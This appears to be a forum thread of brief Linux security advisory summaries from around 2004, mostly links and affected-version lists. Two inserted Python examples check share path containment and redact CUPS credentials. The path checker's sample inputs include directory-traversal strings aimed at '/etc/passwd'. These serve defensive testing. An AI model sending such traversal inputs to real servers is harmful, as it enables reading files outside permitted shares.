The 2.6 kernel adds atiixp support and ia64 support. It fixes alsa
intel8x0 (specifically for nvidia chipsets). It includes the Megaraid
newgen 2.20.3.1 (a new driver that replaces the old megaraid), adds
pwc fork 0.3 (a new driver), 3w-9xxx (new driver), and updates ide
piix/libata (supports ICH6, adds NVIDIA, Promise, Sis, and Vitesse
chipset support). Driver updates of Bcm5700, qla, and ieee1394 were
also included, as well as xfs fixes.

*Affected versions: 10.0
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-4906.html

Regards

eddie


----------



## eddie5659

The Samba server, which allows sharing of files and resources via
the SMB/CIFS protocol, contains a bug in the sanitation code of path
names which allows remote attackers to access files outside of the
defined share. In order to access these files, they must be readable
by the account used for the SMB session.

*Affected products:

8.1, 8.2, 9.0
SUSE Linux Enterprise Server 8
SUSE Linux Desktop 1.0

*

http://www.linuxsecurity.com/advisories/suse_advisory-4907.html

Regards

eddie


----------



## eddie5659

This update fixes an information leakage problem when printing to SMB
shares requiring authentication.

*Product : Fedora Core 2
Name : cups
Version : 1.1.20
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4908.html

Regards

eddie


----------



## eddie5659

Buffer overflows exist in the telnet client and daemon provided by
netkit-telnetd, which could possibly allow a remote attacker to gain
root privileges and compromise the system.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/netkit-telnetd <= 0.17-r3 >= 0.17-r4
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4909.html

Regards

eddie


----------



## eddie5659

Julian Reschke reported a problem in mod_dav of Apache 2 in connection
with a NULL pointer dereference. When running in a threaded model,
especially with Apache 2, a segmentation fault can take out a whole
process and hence create a denial of service for the whole server.

*Package : libapache-mod-dav
*

http://www.linuxsecurity.com/advisories/debian_advisory-4910.html

Regards

eddie


----------



## eddie5659

During the last months a number of security problems have been fixed
in Mozilla and Mozilla based browsers. These include:

- CAN-2004-0718: content in unrelated windows could be modified
- CAN-2004-0722: integer overflow in the SOAPParameter object constructor
- CAN-2004-0757: heap-based buffer overflow in the SendUidl of POP3 code
- CAN-2004-0758: denial-of-service with malicious SSL certificates
- CAN-2004-0759: read files via JavaScript
- CAN-2004-0760: MIME code handles %00 incorrectly
- CAN-2004-0761: spoofing of security lock icon
- CAN-2004-0762: manipulation of XPInstall Security dialog box
- CAN-2004-0763: spoofing of SSL certificates by using redirects and
JavaScript
- CAN-2004-0764: hijacking the user interface via the "chrome" flag and
XML User Interface Language (XUL) files
- CAN-2004-0765: spoofing SSL certificates due to incorrect comparison
of hostnames
- CAN-2004-0902: Several heap based buffer overflows in Mozilla Browsers.
- CAN-2004-0903: Stack-based buffer overflow in the writeGroup function
in vcard handling.
- CAN-2004-0904: Overflow in BMP bitmap decoding.
- CAN-2004-0905: Crossdomain scripting and possible code execution by
javascript drag and drop.
- CAN-2004-0906: XPI Installer sets insecure permissions, allowing local
users to overwrite files of the user.
- CAN-2004-0908: Allow untrusted javascript code to read and write to the
clipboard.
- CAN-2004-0909: Allow remote attackers to trick the user into performing
dangerous operations by modifying security relevant dialog boxes.

*Affected products:

8.1, 8.2, 9.0, 9.1
SUSE Linux Enterprise Server 8, 9
SUSE Linux Desktop 1.0
*

http://www.linuxsecurity.com/advisories/suse_advisory-4912.html

Regards

eddie


----------



## eddie5659

Stefan Nordhausen has identified a local security hole in net-acct, a
user-mode IP accounting daemon. Old and redundant code from some time
way back in the past created a temporary file in an insecure fashion.

*Package : net-acct*

http://www.linuxsecurity.com/advisories/debian_advisory-4913.html

Regards

eddie


----------



## eddie5659

Updated XFree86 packages that fix several security issues in libXpm, as
well as other bug fixes, are now available for Red Hat Enterprise Linux 2.1.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386, ia64
Red Hat Linux Advanced Workstation 2.1 - ia64
Red Hat Enterprise Linux ES version 2.1 - i386
Red Hat Enterprise Linux WS version 2.1 - i386
*

http://www.linuxsecurity.com/advisories/redhat_advisory-4914.html

Regards

eddie


----------



## eddie5659

Carnegie Mellon University's Cyrus-SASL library could allow a local attacker to supply a specially-crafted SASL_PATH environment variable and possibly execute arbitrary code on the system.

*Platforms Affected:

Carnegie Mellon University: Cyrus-SASL Any version 
Gentoo Technologies, Inc.: Gentoo Linux Any version 
MandrakeSoft, Inc.: Mandrake Linux 10.0 
MandrakeSoft, Inc.: Mandrake Linux 9.2 
MandrakeSoft, Inc.: Mandrake Linux Corporate Server 2.1 
Red Hat, Inc.: Red Hat Advanced Workstation 2.1 
Red Hat, Inc.: Red Hat Desktop 3 
Red Hat, Inc.: Red Hat Enterprise Linux 2.1AS 
Red Hat, Inc.: Red Hat Enterprise Linux 2.1ES 
Red Hat, Inc.: Red Hat Enterprise Linux 2.1WS 
Red Hat, Inc.: Red Hat Enterprise Linux 3AS 
Red Hat, Inc.: Red Hat Enterprise Linux 3ES 
Red Hat, Inc.: Red Hat Enterprise Linux 3WS 
*

http://xforce.iss.net/xforce/xfdb/17643

Regards

eddie


----------



## eddie5659

Multiple heap-based overflows have been found in the tiff library image
decoding routines, potentially allowing execution of arbitrary code with
the rights of the user viewing a malicious image.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable /  Unaffected
-------------------------------------------------------------------
1 media-libs/tiff < 3.6.1-r2 >= 3.6.1-r2
2 media-gfx/xv <= 3.10a-r7 >= 3.10a-r8
-------------------------------------------------------------------
2 affected packages on all of their supported architectures.
-------------------------------------------------------------------
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4943.html

eddie


----------



## eddie5659

This update fixes many bugs, mostly in the LDAP backend and the Python
bindings.

*Product : Fedora Core 2
Name : libuser
Version : 0.52.5
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4944.html

eddie


----------



## eddie5659

Squid is a high-performance proxy caching server for Web clients,
supporting FTP, gopher, and HTTP data objects. Unlike traditional
caching software, Squid handles all requests in a single,
non-blocking, I/O-driven process. Squid keeps meta data and especially
hot objects cached in RAM, caches DNS lookups, supports non-blocking
DNS lookups, and implements negative caching of failed requests.

*Product : Fedora Core 2
Name : squid
Version : 2.5.STABLE5
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4945.html

eddie


----------



## eddie5659

system-config-users is a graphical utility for administering
users and groups. It depends on the libuser library.

*Product : Fedora Core 2
Name : system-config-users
Version : 1.2.25
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4946.html

eddie


----------



## eddie5659

WordPress contains HTTP response splitting and cross-site scripting
vulnerabilities.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 www-apps/wordpress < 1.2.1 >= 1.2.1

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4947.html

eddie


----------



## eddie5659

CUPS[1] (Common UNIX Printing System) is an open-source, freely
available and cross-platform printing solution for UNIX
environments.

Alvaro Martinez Echevarria found a vulnerability[2] in the CUPS
Internet Printing Protocol (IPP) implementation that allows remote
attackers to make CUPS stop listening on the IPP port by sending an
empty UDP datagram packet to the IPP port, causing a denial of
service situation.

*RELEASES : 9, 10
*

http://www.linuxsecurity.com/advisories/conectiva_advisory-4948.html

eddie


----------



## eddie5659

Samba[1] provides SMB/CIFS services (such as file and printer
sharing) used by clients compatible with Microsoft Windows(TM).

This announcement fixes two denial of service vulnerabilities via
certain malformed requests[2] and via a SAM_UAS_CHANGE request with a
big length value[3] when domain logons are enabled.

It also fixes a problem[4] in the input validation routines used to
convert DOS path names to path names on the Samba host's file system
that could be exploited to gain access to files outside of the
share's path defined by smb.conf.

*RELEVANT
RELEASES : 9, 10
*

http://www.linuxsecurity.com/advisories/conectiva_advisory-4949.html

eddie
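The Samba fix described above concerns turning a client-supplied DOS path name into a path on the host file system without letting it climb out of the share. The following is an added example, not Samba's own code, of a lexical containment check for that mapping; `share_root` and the sample paths are constructed for illustration.

```python
import posixpath


def resolve_share_path(share_root: str, dos_path: str):
    """Map a client-supplied DOS-style path (backslash separators) onto the
    host file system under share_root.

    Returns the host path, or None when the request would escape the share,
    which is the class of bug the advisory describes.  Hypothetical helper,
    not Samba's own implementation.
    """
    # SMB clients send backslash-separated paths; servers commonly tolerate
    # forward slashes too, so fold both onto the POSIX separator.
    unix_style = dos_path.replace("\\", "/")

    # A path is always relative to the share root, so strip leading
    # separators instead of letting them re-root the path at "/".
    relative = unix_style.lstrip("/")

    # Embedded NUL bytes never belong in a path component; they would
    # truncate the name once it reaches a C string API on the host.
    if "\x00" in relative:
        return None

    # posixpath.normpath collapses ".", ".." and duplicate separators, but it
    # happily returns "../x" for paths that climb above their start, so the
    # result has to be inspected rather than trusted.
    normalized = posixpath.normpath(relative) if relative else "."
    if normalized == ".." or normalized.startswith("../"):
        return None

    root = posixpath.normpath(share_root)
    candidate = root if normalized == "." else posixpath.join(root, normalized)

    # Final containment check: the result must be the root itself or a
    # descendant of it.  Compare against root + "/" so that /srv/share2 is
    # not mistaken for a child of /srv/share.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample requests: two benign, two attempting to escape.
    for req in (r"docs\report.txt", r"\docs\.\a\..\b",
                r"..\..\etc\passwd", r"docs\..\..\secret"):
        print(repr(req), "->", resolve_share_path("/srv/share", req))
```

The check is purely lexical; symlinks inside the share that point outside it are a separate concern and need a realpath-based check against the live file system.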


----------



## eddie5659

This advisory is an addition to DSA 563-1 and 563-2 which weren't able
to supersede the library on sparc and arm due to a different version
number for them in the stable archive. Other architectures were
updated properly. Another problem was reported in connection with
sendmail, though, which should be fixed with this update as well.

*Package : cyrus-sasl
Vulnerability : unsanitised input*

http://www.linuxsecurity.com/advisories/debian_advisory-4950.html

eddie


----------



## eddie5659

K3b provides a comfortable user interface to perform most CD/DVD
burning tasks. While the experienced user can influence all
steps of the burning process, the beginner may find comfort in the
automatic settings and the reasonable k3b defaults which allow a quick
start.

*Product : Fedora Core 2
Name : k3b
Version : 0.11.14
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4951.html

eddie


----------



## eddie5659

An information leak has been detected in CUPS, the Common UNIX
Printing System, which may lead to the disclosure of sensitive
information, such as user names and passwords which are written into
log files.

The used patch only eliminates the authentication information in the
device URI which is logged in the error_log file. It does not
eliminate the URI from the environment and process table, which is why
the CUPS developers recommend that system administrators do not code
authentication information in device URIs in the first place.

http://www.linuxsecurity.com/advisories/debian_advisory-4952.html

eddie
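The Debian fix above strips authentication information from the device URI before it reaches error_log, while the advisory notes that the URI still sits in the environment and process table. As an added example (not the CUPS patch itself), here is a redaction filter of that kind together with an audit check an administrator could run over configured device URIs; the log line and URIs are constructed samples.

```python
import re
from urllib.parse import urlsplit, urlunsplit

# Matches scheme://... tokens as they appear inside a free-text log line.
_URI_RE = re.compile(r"[A-Za-z][A-Za-z0-9+.-]*://[^\s\"']+")


def uri_has_credentials(uri: str) -> bool:
    """True when the URI carries a password in its userinfo part
    (user:password@host), i.e. the pattern the CUPS developers advise
    against using in device URIs."""
    netloc = urlsplit(uri).netloc
    if "@" not in netloc:
        return False
    userinfo = netloc.rsplit("@", 1)[0]
    return ":" in userinfo


def redact_device_uri(uri: str) -> str:
    """Return the URI with any password replaced by '****'.

    Scheme, user name, host, port, path and query are kept so the log entry
    remains useful for troubleshooting.  rsplit on '@' keeps this correct
    for IPv6 hosts ([::1]) and for raw '@' characters inside the password.
    """
    parts = urlsplit(uri)
    netloc = parts.netloc
    if "@" not in netloc:
        return uri
    userinfo, hostport = netloc.rsplit("@", 1)
    if ":" in userinfo:
        user, _password = userinfo.split(":", 1)
        userinfo = f"{user}:****"
    return urlunsplit(parts._replace(netloc=f"{userinfo}@{hostport}"))


def redact_log_line(line: str) -> str:
    """Apply redact_device_uri to every URI found in a log line."""
    return _URI_RE.sub(lambda m: redact_device_uri(m.group(0)), line)


if __name__ == "__main__":
    # Constructed sample error_log entry, not real CUPS output.
    sample = ("E [01/Nov/2004:12:00:00 +0000] Unable to connect to "
              "smb://alice:s3cret@fileserver/hp4000")
    print(redact_log_line(sample))
    for uri in ("smb://alice:s3cret@fileserver/hp4000",
                "lpd://bob@printhost/queue",
                "ipp://printer.example/printers/hp4000"):
        print(uri, "-> credentials:", uri_has_credentials(uri))
```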


----------



## eddie5659

The GIMP (GNU Image Manipulation Program) is a powerful image
composition and editing program, which can be extremely useful for
creating logos and other graphics for webpages. The GIMP has many of
the tools and filters you would expect to find in similar commercial
offerings, and some interesting extras as well. The GIMP provides a
large image manipulation toolbox, including channel operations and
layers, effects, sub-pixel imaging and anti-aliasing, and conversions,
all with multi-level undo.

*Product : Fedora Core 2
Name : gimp
Version : 2.0.5
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4953.html

eddie


----------



## eddie5659

The libtiff package contains a library of functions for manipulating
TIFF (Tagged Image File Format) image format files. TIFF is a widely
used file format for bitmapped images. TIFF files usually end in the
.tif extension and they are often quite large.

The libtiff package should be installed if you need to manipulate TIFF
format image files.

*Product : Fedora Core 2
Name : libtiff
Version : 3.5.7
*

http://www.linuxsecurity.com/advisories/fedora_advisory-4954.html

eddie


----------



## eddie5659

Several problems have been discovered in libtiff, the Tag Image File
Format library for processing TIFF graphics files. An attacker could
prepare a specially crafted TIFF graphic that would cause the client
to execute arbitrary code or crash.

*Package : tiff
*

http://www.linuxsecurity.com/advisories/debian_advisory-4960.html

eddie


----------



## eddie5659

Gaim is an instant messenger application for Microsoft Windows and Linux-based operating systems. Gaim versions prior to 1.02 are vulnerable to a buffer overflow, caused by improper bounds checking of user-supplied input when handling MSN (Microsoft Network) SLP protocol messages. By sending a specially-crafted sequence of MSN SLP messages to Gaim, a remote attacker could overflow a buffer and execute arbitrary code on the system.

*Platforms Affected:

Gaim Project: Gaim prior to 1.02 
kernel.org: Linux Any version 
Microsoft Corporation: Windows Any version 
*

http://xforce.iss.net/xforce/xfdb/17786

eddie


----------



## eddie5659

In certain configurations, it can be possible to bypass restrictions
set by the "SSLCipherSuite" directive of mod_ssl.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-www/apache < 2.0.52 >= 2.0.52 (or < 2.0)
2 net-www/mod_ssl < 2.8.20 >= 2.8.20
-------------------------------------------------------------------
2 affected packages on all of their supported architectures.
-------------------------------------------------------------------

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-4995.html

eddie


----------



## eddie5659

Multiple integer overflow issues affect xpdf-2.0 and xpdf-3.0, as well
as programs like cups which have embedded versions of xpdf. These can
result in writing an arbitrary byte to an attacker-controlled location,
which could probably lead to arbitrary code execution.

Multiple further integer overflow issues affect xpdf-3.0 only. These
can result in DoS or possibly arbitrary code execution.

*Affected versions: 10.0, Corporate Server 2.1
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-5000.html

eddie


----------



## eddie5659

Multiple integer overflow issues affecting xpdf-2.0 and xpdf-3.0.
Also programs like cups which have embedded versions of xpdf.
These can result in writing an arbitrary byte to an attacker controlled
location which probably could lead to arbitrary code execution

*Affected versions: 10.0, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-5002.html

eddie


----------



## eddie5659

This announcement updates mozilla packages for Conectiva Linux 9 and
10 to mozilla version 1.7.3. This update fixes lots of
vulnerabilities.

*RELEASES : 9, 10
*

http://www.linuxsecurity.com/advisories/conectiva_advisory-5004.html

eddie


----------



## eddie5659

Updated cups packages that fix denial of service issues, a security
information leak, as well as other various bugs are now available.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, ppc64, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/advisories/redhat_advisory-5005.html

eddie


----------



## eddie5659

Updated libtiff packages that fix various buffer and integer overflows are
now available.

*Relevant releases/architectures:

Red Hat Enterprise Linux AS (Advanced Server) version 2.1 - i386, ia64
Red Hat Linux Advanced Workstation 2.1 - ia64
Red Hat Enterprise Linux ES version 2.1 - i386
Red Hat Enterprise Linux WS version 2.1 - i386
Red Hat Enterprise Linux AS version 3 - i386, ia64, ppc, s390, s390x, x86_64
Red Hat Desktop version 3 - i386, x86_64
Red Hat Enterprise Linux ES version 3 - i386, ia64, x86_64
Red Hat Enterprise Linux WS version 3 - i386, ia64, x86_64
*

http://www.linuxsecurity.com/advisories/redhat_advisory-5006.html

eddie


----------



## eddie5659

iDEFENSE discovered a Denial of Service vulnerability in squid version
2.5.STABLE6 and previous. The problem is due to an ASN1 parsing error
where certain header length combinations can slip through the
validations performed by the ASN1 parser, leading to the server
assuming there is heap corruption or some other exceptional condition,
and closing all current connections then restarting.

Squid 2.5.STABLE7 has been released to address this issue; the provided
packages are patched to fix the issue.

*Affected versions: 10.0, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-5007.html

eddie


----------



## eddie5659

http://forums.techguy.org/t287947.html


----------



## eddie5659

Going to create a separate sticky, just in case others don't see this one. Will remove in a week 

I'm on a mailing list for Bugtraq, and this caught my eye:

Emails that pretend to come from the Red Hat Security Team are circulating in
the wild. These emails tell users to download and install malicious updates.
These trojan updates contain malicious code designed to compromise the systems they are run on. 

Regards.
K-OTik Security Research & Survey Team 24/7



eddie


----------



## eddie5659

shadow is a freely available suite of password utilities for Unix and Linux platforms. shadow versions prior to 4.0.5 could allow a local attacker to perform unauthorized account modifications, caused by a vulnerability in the chfn and chsh change utilities. The passwd_check function in the libmisc/pwdcheck.c file fails to properly validate user privileges. A local unauthorized user could use this vulnerability to modify account information.

*Platforms Affected:

Linux: Linux Any version 
Shadow SITE: shadow prior to 4.0.5 
Various: Unix Any version 
*

http://xforce.iss.net/xforce/xfdb/17902

Regards

eddie


----------



## eddie5659

A vulnerability in mod_ssl was discovered by Hartmut Keil. After a
renegotiation, mod_ssl would fail to ensure that the requested cipher
suite is actually negotiated. The provided packages have been patched
to prevent this problem.

*Affected versions: 10.0, 10.1, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2
*

http://www.linuxsecurity.com/advisories/mandrake_advisory-5061.html

eddie


----------



## eddie5659

A buffer overflow vulnerability exists in mod_include which could
possibly allow a local attacker to gain escalated privileges.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-www/apache < 1.3.32-r1 >= 1.3.32-r1
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-5062.html

eddie


----------



## eddie5659

A vulnerability in the Speedtouch USB driver can be exploited to allow
local users to execute arbitrary code with escalated privileges.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-dialup/speedtouch < 1.3.1 >= 1.3.1
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-5063.html

eddie


----------



## eddie5659

Chris Evans discovered several integer overflows in xpdf, a viewer for
PDF files, which can be exploited remotely by a specially crafted PDF
document and lead to the execution of arbitrary code.

*For the stable distribution (woody) these problems have been fixed in
version 1.00-3.2.

For the unstable distribution (sid) these problems have been fixed in
version 3.00-9.

We recommend that you upgrade your xpdf package.
*

http://www.linuxsecurity.com/advisories/debian_advisory-5064.html

eddie


----------



## eddie5659

"infamous41md" discovered several buffer overflows in libxml and
libxml2, the XML C parser and toolkits for GNOME. Missing boundary
checks could cause several buffers to be overflown, which may cause
the client to execute arbitrary code.

*Package : libxml, libxml2*

http://www.linuxsecurity.com/advisories/debian_advisory-5065.html

eddie


----------



## eddie5659

MIME-tools doesn't handle empty MIME boundaries correctly. This may
prevent some virus-scanning programs which use MIME-tools from
detecting certain viruses.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-perl/MIME-tools < 5.415 >= 5.415
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-5067.html

eddie


----------



## eddie5659

pppd contains a bug that allows an attacker to crash his own
connection, but it cannot be used to deny service to other users.

http://www.linuxsecurity.com/advisories/gentoo_advisory-5068.html

eddie


----------



## eddie5659

Trustix developers discovered insecure temporary file creation in a
supplemental script in the lvm10 package that didn't check for
existing temporary directories, allowing local users to overwrite
files via a symlink attack.

*For the stable distribution (woody) this problem has been fixed in
version 1.0.4-5woody2.

For the unstable distribution (sid) this problem will be fixed soon.

We recommend that you upgrade your lvm10 package.
*

http://www.linuxsecurity.com/advisories/debian_advisory-5069.html

eddie


----------



## eddie5659

This announcement fixes a denial of service vulnerability[2] in squid
caused by a malformed NTLMSSP packet. This causes a negative value to
be passed to memcpy on servers with NTLM authentication enabled,
making squid abort and causing a denial of service condition.

*RELEASES : 9, 10
*

http://www.linuxsecurity.com/advisories/conectiva_advisory-5071.html

eddie


----------



## eddie5659

Proxytunnel is vulnerable to a format string vulnerability, potentially
allowing a remote server to execute arbitrary code with the rights of
the Proxytunnel process.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/proxytunnel < 1.2.3 >= 1.2.3

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-5072.html

eddie


----------



## eddie5659

The PNG image decoding routines in the GD library contain an integer
overflow that may allow execution of arbitrary code with the rights of
the program decoding a malicious PNG image.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 media-libs/gd < 2.0.32 >= 2.0.32

*

http://www.linuxsecurity.com/advisories/gentoo_advisory-5073.html

eddie


----------



## eddie5659

HP OpenView Operations is a platform that is used to monitor, control, and report on the health of the operating system. HP OpenView Operations versions 7.x and 8.0 running on HP-UX, 7.x and 8.0 running on Solaris, and OpenView VantagePoint versions 6.x running on HP-UX and Solaris could allow a remote authenticated attacker to gain elevated privileges on the system, caused by an unspecified vulnerability. An unauthorized operator could use this vulnerability to launch further attacks against the system.

*Platforms Affected:

Hewlett-Packard Company: HP OpenView Operations 7.x 
Hewlett-Packard Company: HP OpenView Operations 8.0 
Hewlett-Packard Company: HP OpenView VantagePoint 6.x 
*

http://xforce.iss.net/xforce/xfdb/17932

Regards

eddie


----------



## eddie5659

SASL[1] is the Simple Authentication and Security Layer, a method for
adding authentication support to connection-based protocols.

A vulnerability[2] has been discovered in the Cyrus implementation of
the SASL library. The library honors the environment variable
SASL_PATH blindly, which allows a local attacker to link against a
malicious library to run arbitrary code with the privileges of a
setuid or setgid application.

*RELEASES : 9, 10
*

http://www.linuxsecurity.com/advisories/conectiva_advisory-5150.html

eddie


----------



## eddie5659

Pavuk contains multiple buffer overflows that can allow a remote
attacker to run arbitrary code.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/pavuk < 0.9.31 >= 0.9.31
*

http://www.linuxsecurity.com/advisories/gentoo_advisory-5151.html

eddie


----------



## eddie5659

Ulf Härnhammar from the Debian Security Audit Project discovered a
format string vulnerability in ez-ipupdate, a client for many dynamic
DNS services. This problem can only be exploited if ez-ipupdate is
running in daemon mode (most likely) with many but not all service
types.

For the stable distribution (woody) this problem has been fixed in
version 3.0.11b5-1woody2.

For the unstable distribution (sid) this problem has been fixed in
version 3.0.11b8-8.

We recommend that you upgrade your ez-ipupdate package.

http://www.linuxsecurity.com/advisories/debian_advisory-5162.html

eddie


----------



## eddie5659

ez-ipupdate is a freely available tool used to update host names for Linux, BSD and Solaris platforms. ez-ipupdate versions 3.0.11b8, 3.0.11b7, 3.0.11b6, 3.0.11b5 and 3.0.10 could allow a remote attacker to execute arbitrary commands on a vulnerable client, caused by a format string vulnerability in the show_message function. If daemon mode is enabled, a remote attacker in control of a malicious server could supply a specially-crafted response containing format specifiers to execute arbitrary commands on the victim's system.

*Platforms Affected:

Angus' Projects: ez-ipupdate 3.0.10 
Angus' Projects: ez-ipupdate 3.0.11b5 
Angus' Projects: ez-ipupdate 3.0.11b6 
Angus' Projects: ez-ipupdate 3.0.11b7 
Angus' Projects: ez-ipupdate 3.0.11b8 
Debian Project: Debian Linux 3.0 
Gentoo Technologies, Inc.: Gentoo Linux Any version 
MandrakeSoft, Inc.: Mandrake Linux 10.0 
MandrakeSoft, Inc.: Mandrake Linux 10.1 
MandrakeSoft, Inc.: Mandrake Linux 9.2 
MandrakeSoft, Inc.: Mandrake Linux Corporate Server 2.1 
MandrakeSoft, Inc.: Mandrake Multi Network Firewall 8.2 
*

http://xforce.iss.net/xforce/xfdb/18032

eddie


----------



## eddie5659

Apache HTTP Server versions 2.0.52 and earlier running on Unix platforms are vulnerable to a denial of service attack. By sending specially-crafted HTTP GET requests, a remote attacker could cause the server to consume all available CPU resources and hang.

*Platforms Affected:

Apache Software Foundation: Apache HTTP Server 2.0.52 and earlier 
Gentoo Technologies, Inc.: Gentoo Linux Any version 
Red Hat, Inc.: Red Hat Desktop 3 
Red Hat, Inc.: Red Hat Enterprise Linux 3AS 
Red Hat, Inc.: Red Hat Enterprise Linux 3ES 
Red Hat, Inc.: Red Hat Enterprise Linux 3WS 
Ubuntu and Canonical: Ubuntu 4.10 
Various: Unix Any version 
*

http://xforce.iss.net/xforce/xfdb/17930

eddie


----------



## eddie5659

SETI@home is a freely available program that analyzes radio telescope data for the Search for Extraterrestrial Intelligence (SETI). GIMPS (Great Internet Mersenne Prime Search) is a program for finding Mersenne primes. ChessBrain is the distributed chess supercomputer client. SETI@home, GIMPS and ChessBrain allow init scripts to execute user-owned files with root privileges. A local attacker could use this vulnerability to gain elevated privileges.

*Platforms Affected:

Gentoo Technologies, Inc.: Gentoo Linux Any version 
GIMPS: GIMPS Any version 
SETI@home: SETI@home Any version 
The ChessBrain project: ChessBrain Any version 
*

http://xforce.iss.net/xforce/xfdb/18149

eddie


----------



## eddie5659

"infamous41md" discovered a buffer overflow condition in hpsockd, the
socks server written at Hewlett-Packard. An exploit could cause the
program to crash or may have a worse effect.

*For the stable distribution (woody) this problem has been fixed in
version 0.6.woody1.

For the unstable distribution (sid) this problem has been fixed in
version 0.14.
*

http://www.linuxsecurity.com/content/view/117313/100/

eddie


----------



## eddie5659

Stefan Esser reported various bugs within the Cyrus IMAP Server.
These include buffer overflows and out-of-bounds memory access
which could allow remote attackers to execute arbitrary commands
as root. The bugs occur in the pre-authentication phase, therefore
an update is strongly recommended.

*Affected products:

8.1, 8.2, 9.0, 9.1, 9.2
SUSE Linux Enterprise Server 8, 9
SuSE-Linux-Standard-Server 8
SuSE Linux Openexchange Server 4

*

http://www.linuxsecurity.com/content/view/117317/112/

eddie


----------



## eddie5659

rssh and scponly do not filter command-line options that can be
exploited to execute any command, thereby allowing a remote user to
completely bypass the restricted shell.

*Affected packages
=================

-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 net-misc/scponly < 4.0 >= 4.0
2 app-shells/rssh <= 2.2.2 Vulnerable!
-------------------------------------------------------------------
NOTE: Certain packages are still vulnerable. Users should migrate to
another package if one is available or wait for the existing packages
to be marked stable by their architecture maintainers.
-------------------------------------------------------------------
2 affected packages on all of their supported architectures.
-------------------------------------------------------------------
*

http://www.linuxsecurity.com/content/view/117364/104/

eddie


----------



## eddie5659

The recent update to cyrus-imapd-2.2.10-1.fc2 for security exploits
revealed a package installation problem.

*Product : Fedora Core 2
Name : cyrus-imapd
Version : 2.2.10
Release : 3.fc2
*

http://www.linuxsecurity.com/content/view/117366/102/

eddie


----------



## eddie5659

The recent update to cyrus-imapd-2.2.10-1.fc3 for security exploits revealed a package installation problem.

*Product : Fedora Core 3
Name : cyrus-imapd
Version : 2.2.10
Release : 3.fc3
*

http://www.linuxsecurity.com/content/view/117367/102/

eddie


----------



## eddie5659

The Trustix developers found that the der_chop script, included in the
openssl package, created temporary files insecurely. This could allow
local users to overwrite files using a symlink attack.

*Affected versions:

10.0, 10.1, 9.2, Corporate Server 2.1,
Multi Network Firewall 8.2

*

http://www.linuxsecurity.com/content/view/117412/106/

eddie


----------



## eddie5659

The updated version of Midnight Commander contains finished CAN-2004-0494 security fixes in extfs scripts and has better support for UTF-8, contains subshell prompt fixes and enhanced large file support.

*Product : Fedora Core 3
Name : mc
Version : 4.6.1
Release : 0.11FC3
*

http://www.linuxsecurity.com/content/view/117417/102/

eddie


----------



## eddie5659

udev is an implementation of devfs in userspace using sysfs and /sbin/hotplug. It requires a 2.6 kernel to run properly.

*Product : Fedora Core 3
Name : udev
Version : 039
Release : 10.FC3.4
*

http://www.linuxsecurity.com/content/view/117418/102/

eddie


----------



## eddie5659

fixed udev.rules for cdrom symlinks (bug 141897)

*Product : Fedora Core 3
Name : udev
Version : 039
Release : 10.FC3.5
*

http://www.linuxsecurity.com/content/view/117419/102/

eddie


----------



## eddie5659

fixed again gnome-bluetooth-manager script for 64bit (bug 134864)

*Product : Fedora Core 3
Name : gnome-bluetooth
Version : 0.5.1
Release : 5.FC3.1
*

http://www.linuxsecurity.com/content/view/117420/102/

eddie


----------



## eddie5659

MaxDB is a SAP-certified open-source database for Online Transaction Processing (OLTP) and On-Line Analytical Processing (OLAP) usage. MaxDB versions 7.5.00.18 and earlier are vulnerable to a stack-based buffer overflow in the WebDav server. A remote attacker could exploit this vulnerability to overflow a buffer and execute arbitrary code on the system with root privileges.

*Platforms Affected:

Hewlett-Packard Company: Compaq Tru64 UNIX 5.1 
Hewlett-Packard Company: Compaq Tru64 UNIX 5.1a 
Hewlett-Packard Company: Compaq Tru64 UNIX 5.1b 
Hewlett-Packard Company: HP-UX 11.00 
Hewlett-Packard Company: HP-UX 11.11 
Hewlett-Packard Company: HP-UX 11.23 
IBM: AIX 5.1 
IBM: AIX 5.2 
